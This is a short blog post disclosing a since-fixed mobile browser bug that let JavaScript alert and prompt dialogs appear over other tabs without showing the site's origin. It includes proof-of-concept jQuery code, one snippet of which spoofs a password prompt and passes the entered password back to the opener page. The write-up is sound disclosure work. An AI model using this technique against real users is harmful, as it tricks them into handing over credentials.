Alert Origin Spoofing

When we use one of the following JavaScript commands alert,confirm or prompt we always get a popup box with the following text “https://example.com says:”.
This prefix can seem negligible, but I assure you  it’s not.
I think this text is a very important security feather, it allows the user to understand what website is requesting or displaying data.

A few months ago I found a very interesting bug that allowed me to create alerts with no origin identification. I was also able to generate this alert on the current active tab as long as my website was running in one of the background tabs.

Since most browser are using the native device alert, when you set a timeout on an alert function it will still be visible from any tab.

$("button").click(function (){
   window.open("https://google.com");
   setTimeout(function(){
      alert('Hey!');
   },5000);
});

The code above will let you run alerts on other domains as long as your using a mobile device. the down side is that it will still start with “https://ronmasas.com says:” so it’s not that interesting.

Luckily I also found a way to remove the origin, I did it by calling the alert function from from an origin-less page. the results were quite good, on iOS devices I completely remove the origin and on Android it was replaced to the word “JavaScript”.

iOS Simulator Screen Shot May 18, 2015, 2.10.18 PM  android

var myWindow;

$("button").click(function (){
   setTimeout(function(){
       window.open('https://google.com');
       myWindow = window.open("var password = prompt('Give me your password    please',''); window.opener.save(password); window.close();");
   },5000);
});

// Callback function
function save(password){
   alert("Password is " + password);
}

This bug was reported and fixed by Google.